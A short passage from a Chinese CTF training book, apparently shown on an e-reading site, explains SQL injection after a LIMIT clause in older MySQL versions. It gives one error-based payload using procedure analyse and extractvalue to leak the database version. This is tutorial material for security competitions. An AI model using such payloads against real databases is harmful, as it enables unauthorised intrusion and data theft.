CTF特训营:技术详解、解题方法与竞赛技巧
上QQ阅读APP看书,第一时间看更新
上一章目录下一章

2.7 limit之后的注入

研究发现,在MySQL版本号大于5.0.0且小于5.6.6的时候,在如下位置中可以进行注入:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT {injection_point}

也可以使用如下的Payload进行注入:

SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
本周热推:
信息安全风险评估手册(第2版)脑洞大开:渗透测试另类实战攻略华为防火墙实战指南信息安全技术专业基于工作过程支撑平台课程体系开发实践一本书讲透混合云安全
上一章目录下一章